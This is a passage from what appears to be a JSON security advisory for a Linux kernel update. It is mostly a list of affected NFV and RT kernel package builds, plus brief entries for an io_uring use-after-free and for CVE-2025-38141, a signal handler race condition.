"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel io_uring: Local privilege escalation, information disclosure, or denial of service via use-after-free"
},
{
"cve": "CVE-2025-38141",
"cwe": {
"id": "CWE-364",
"name": "Signal Handler Race Condition"
},
"discovery_date": "2025-07-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376052"
}
],
"notes": [
{
"category": "description",
